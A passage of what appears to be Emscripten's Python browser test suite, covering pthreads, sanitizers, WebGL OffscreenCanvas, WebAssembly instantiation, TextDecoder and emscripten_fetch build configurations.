self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'TOTAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
# Test that STACK_BASE and STACK_MAX correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS', '-std=c++11'])
@no_fastcomp('WASM backend stack protection')
@requires_threads
def test_pthread_safe_stack(self):
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'DEFAULT_PTHREAD_STACK_SIZE=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('LSan is only supported on WASM backend')
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('ASan is only supported on WASM backend')
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@no_fastcomp('ASan is only supported on WASM backend')
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
create_test_file('wasm.cpp',
self.with_report_result(
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp')).read()))
self.compile_btest(['wasm.cpp', '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler registered with signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
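# Build source data covering every possible byte pair so the embedded memory
# initializer (MEM_INIT_METHOD=2 stores it as a JS string) must round-trip all
# values correctly.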
@no_wasm_backend('mem init file')
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
@no_wasm_backend('mem init file')
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s WASM=0 --separate-asm as well.
@no_wasm_backend('asm.js')
def test_minimal_runtime_separate_asm(self):
for opts in [['-s', 'MINIMAL_RUNTIME=1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0', '--separate-asm'] + opts)
self.run_browser('test.html', None, '/report_result?0')
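# Test --separate-asm with WASM=0: the asm.js module is split out into its own
# file (test.asm.js / asm.js below), which must be loaded before the rest of
# the runtime JS.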
@no_wasm_backend('asm.js')
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
create_test_file('one.html', '<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
create_test_file('two.html', '''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('test.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
self.assertExists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
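# Test EMTERPRETIFY_FILE: the emterpreter bytecode is emitted into a separate
# code.dat file, which the custom shell fetches via XHR and assigns to
# Module.emterpreterFile before loading test.js.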
@no_wasm_backend('emterpretify - bytecode in a file')
def test_emterpretify_file(self):
create_test_file('shell.html', '''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
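# With --proxy-to-worker and a bare <script> include instead of the generated
# HTML, the output JS must still set up the worker proxying by itself.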
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
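    # Build three times and compare test.js sizes: TEXTDECODER=0 (JS fallback only), the default (TextDecoder with fallback), and TEXTDECODER=2 (TextDecoder required, no fallback); the no-fallback build should be smallest.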
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
@no_fastcomp('not optimized in fastcomp')
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5680), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
  # Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has first been used to render WebGL content in a pthread
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1']
if asyncify:
if not self.is_wasm_backend():
continue
# given the synchronous render loop here, asyncify is needed to see intermediate frames and the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
  # Tests the feature that the shell html page can preallocate the typed array and place it in Module.buffer before loading the script.
  # In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
  # Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
  # Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
  # Tests emscripten_fetch() usage when the user passes none of the three main flags (append/replace/no_download).
  # In that case, append is implicitly assumed.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
